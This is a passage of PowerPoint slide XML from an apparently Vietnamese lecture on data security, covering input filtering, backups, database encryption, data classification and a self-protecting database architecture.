                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Vì </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các hoạt động độc hại</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 đối với hệ thống”</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 không nhất thiết phải từ kẻ tấn công, kỹ sư bảo mật cần thời gian để </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kiểm tra và </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xem hoạt động có thực sự nguy hiểm hay không</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Bef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" ker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3200" kern="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nên chúng ta cần thường xuyên xây dựng các bản backup để tránh thiệt hại cho hệ thống và dữ liệu của người dùng.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B317B3-D3E2-1F8C-014C-EF452858CE24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14951441" y="2083393"/>
            <a:ext cx="2699395" cy="2760602"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="6349975"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D577389-B2F2-14DD-424D-D048CD66889A}"/>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txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E89B08B-D2F9-BFBF-A808-CF49B901244D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7783011" y="9105505"/>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6</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164984771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2D81EE01-3628-108E-B7EB-A7CD34BEC10C}"/>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1683666-1CE6-80A3-054B-B739FEA0DE55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="742950" y="2698266"/>
            <a:ext cx="16802100" cy="6712434"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE13FF83-1033-2D57-6FC2-2580D112312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7E451662-70A3-D440-613B-18E8937A283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0063E101-B661-1C28-E938-C4D4FC6BDBE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1453558" y="3439524"/>
            <a:ext cx="7315200" cy="4743478"/>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3200">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Mỗi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mục dữ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>liệu gửi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>từ máy khách đến máy chủ đều được </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>kiểm tra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>và </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>lọc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> trước khi đến cơ sở dữ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>liệu.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:effectLst/>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r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Dữ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>liệu trong cơ sở dữ liệu có thể được mã hóa và ngay cả trong trường hợp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>xâm nhập, kẻ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tấn công không thể sử dụng dữ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>liệu đó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">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endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3269EF9-D048-6246-16D1-8A89F4779294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="2740628"/>
            <a:ext cx="10177264"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3 Lựa chọn các kỹ thuật trong bảo mật dữ liệu đầu vào</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D1F911C-5081-56CF-17CD-CED55C89A48C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9163051" y="3478522"/>
            <a:ext cx="7981948" cy="3531288"/>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3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Dữ liệu có thể được chia thành </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>công khai, phân loại </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>được ủy quyền</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>và </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>riêng tư. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">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r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ví dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kế toán viên có thể xem dữ liệu bảng lương cho tất cả nhân viên) và dữ liệu riêng tư chỉ có thể được truy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bởi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>người dùng đã </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>chèn nó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>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5ABBAA8-FB6F-21CB-FF8C-BFDA5DC207BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8991600" y="3367766"/>
            <a:ext cx="0" cy="5509534"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDE420D2-84A0-BF05-6C36-16EDE3AB18D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641901" y="9116326"/>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7</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/19</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57633644-05AE-F758-5715-8FCC2B0243B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2680628"/>
            <a:ext cx="16802100" cy="7442430"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70556116-A017-23AC-3C61-83D667F0A3F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ED1BA458-8772-2DBE-E547-07AED6D4D06E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="71151"/>
              <a:ext cx="1950879" cy="334605"/>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latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="32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a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Malgun Gothic" panose="020B0503020000020004" pitchFamily="34" charset="-127"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAC0BB1E-3517-3A12-40A8-E5521D4A8767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11030026" y="3039184"/>
            <a:ext cx="5878168" cy="5579280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01B4FE3E-1914-17C0-D497-BA9A4DD9AD12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3611170"/>
            <a:ext cx="8877297" cy="3200876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ử dụng các chính sách nhúng vào chính cơ sở dữ liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ho phép các chính sách này chặn mọi nỗ lực thỏa hiệp trạng thái của cơ sở dữ liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>oặc thay đổi cấu hình của nó theo với những gì đã được chủ sở hữu hệ thống thiết lập </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ban đầu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7CE1E80-53DB-2DC7-4FA4-36EB9B723619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11331606" y="8508786"/>
            <a:ext cx="5737193" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kiến trúc của cơ sở dữ liệu tự bảo vệ [11]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D23794C-577C-A672-C992-32CB18122B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
